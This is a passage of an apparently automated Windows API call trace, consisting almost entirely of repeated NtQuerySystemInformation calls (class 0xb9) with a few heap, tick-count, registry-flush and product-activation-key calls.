(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdea0, Length=0x20, ResultLength=0x0) [0258.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe420, Length=0x20, ResultLength=0x0) [0258.117] GetTickCount () returned 0x1180ea4 [0258.117] GetProcessHeap () returned 0x2026c630000 [0258.117] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x18) returned 0x2026d421040 [0258.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe1d0, Length=0x30, ResultLength=0x0) [0258.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe0d0, Length=0x38, ResultLength=0x0) [0258.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe0d0, Length=0x38, ResultLength=0x0) [0258.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe0d0, Length=0x38, ResultLength=0x0) [0258.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe050, Length=0x30, ResultLength=0x0) [0258.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdfc0, Length=0x38, ResultLength=0x0) [0258.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf20, Length=0x30, ResultLength=0x0) [0258.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe0d0, Length=0x38, ResultLength=0x0) [0258.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe0d0, Length=0x38, ResultLength=0x0) [0258.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe010, Length=0x30, ResultLength=0x0) [0258.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf70, Length=0x20, ResultLength=0x0) [0258.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe010, Length=0x30, ResultLength=0x0) [0258.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf50, Length=0x30, ResultLength=0x0) [0258.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.124] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe0d0, Length=0x38, ResultLength=0x0) [0258.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe000, Length=0x30, ResultLength=0x0) [0258.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdec0, Length=0x18, ResultLength=0x0) [0258.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.283] RegFlushKey (hKey=0x148) returned 0x0 [0258.289] NtLockProductActivationKeys (pPrivateVer=0x0, pSafeMode=0x0) returned 0x0 [0258.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe0d0, Length=0x38, ResultLength=0x0) [0258.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe0d0, Length=0x38, ResultLength=0x0) [0258.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe0d0, Length=0x38, ResultLength=0x0) [0258.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe010, Length=0x30, ResultLength=0x0) [0258.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf70, Length=0x20, ResultLength=0x0) [0258.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe010, Length=0x30, ResultLength=0x0) [0258.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf50, Length=0x30, ResultLength=0x0) [0258.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe340, Length=0x28, ResultLength=0x0) [0258.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe340, Length=0x28, ResultLength=0x0) [0258.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe220, Length=0x58, ResultLength=0x0) [0258.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe110, Length=0x38, ResultLength=0x0) [0258.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf50, Length=0x28, ResultLength=0x0) [0258.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf50, Length=0x28, ResultLength=0x0) [0258.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf50, Length=0x28, ResultLength=0x0) [0258.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf50, Length=0x28, ResultLength=0x0) [0258.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdfc0, Length=0x28, ResultLength=0x0) [0258.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe110, Length=0x38, ResultLength=0x0) [0258.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe110, Length=0x38, ResultLength=0x0) [0258.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe040, Length=0x28, ResultLength=0x0) [0258.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe040, Length=0x28, ResultLength=0x0) [0258.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe110, Length=0x38, ResultLength=0x0) [0258.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe110, Length=0x38, ResultLength=0x0) [0258.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdeb0, Length=0x20, ResultLength=0x0) [0258.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efde30, Length=0x20, ResultLength=0x0) [0258.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efde30, Length=0x20, ResultLength=0x0) [0258.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efde30, Length=0x20, ResultLength=0x0) [0258.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe080, Length=0x20, ResultLength=0x0) [0258.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe110, Length=0x38, ResultLength=0x0) [0258.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdfa0, Length=0x20, ResultLength=0x0) [0258.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf20, Length=0x20, ResultLength=0x0) [0258.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf20, Length=0x20, ResultLength=0x0) [0258.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf20, Length=0x20, ResultLength=0x0) [0258.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe110, Length=0x38, ResultLength=0x0) [0258.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdfa0, Length=0x20, ResultLength=0x0) [0258.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf20, Length=0x20, ResultLength=0x0) [0258.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf20, Length=0x20, ResultLength=0x0) [0258.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf20, Length=0x20, ResultLength=0x0) [0258.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe110, Length=0x38, ResultLength=0x0) [0258.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdfa0, Length=0x20, ResultLength=0x0) [0258.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf30, Length=0x20, ResultLength=0x0) [0258.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf30, Length=0x20, ResultLength=0x0) [0258.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0258.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe150, Length=0x40, ResultLength=0x0) [0258.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe070, Length=0x38, ResultLength=0x0) [0258.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf90, Length=0x38, ResultLength=0x0) [0258.307] 